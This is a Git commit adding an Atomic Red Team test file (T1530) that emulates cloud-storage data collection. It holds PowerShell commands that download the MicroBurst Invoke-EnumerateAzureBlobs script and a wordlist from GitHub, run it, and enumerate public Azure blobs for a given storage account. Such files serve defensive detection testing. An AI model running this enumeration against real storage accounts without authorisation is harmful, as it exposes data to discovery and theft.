security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create T1530.yaml

Browse Source
This commit is contained in:
Leo Verlod
2022-06-14 02:23:52 -05:00
committed by GitHub
parent 9c3785a4ca
commit 307665de3b
1 changed files with 43 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1530/T1530.yaml
+43
View File
@@ -0,0 +1,43 @@
attack_technique: T1530
display_name: Data from Cloud Storage Object
atomic_tests:
- name: Enumerate Azure Blobs with MicroBurst
description: |
Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account.
See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ .
supported_platforms:
- windows
input_arguments:
base:
description: Azure blob keyword to enumerate (Example, storage account name)
type: String
default: secure
output_file:
description: File to output results to
type: String
default: $env:temp\T1530Test1.txt
wordlist:
description: File path to keywords for search permutations
type: String
default: $env:temp\permutations.txt
dependency_executor_name: powershell
dependencies:
- description: |
The Invoke-EnumerateAzureBlobs module must exist in $env:temp.
prereq_command: |
if (test-path $env:temp\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1}
get_prereq_command: |
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "$env:temp\Invoke-EnumerateAzureBlobs.ps1"
- description: |
The wordlist file for search permutations must exist in $env:temp.
prereq_command: |
if (test-path #{wordlist}){exit 0} else {exit 1}
get_prereq_command: |
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"
executor:
command: |
import-module "$env:temp\Invoke-EnumerateAzureBlobs.ps1"
Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}"
cleanup_command: |
remove-item #{output_file} -erroraction silentlycontinue
name: powershell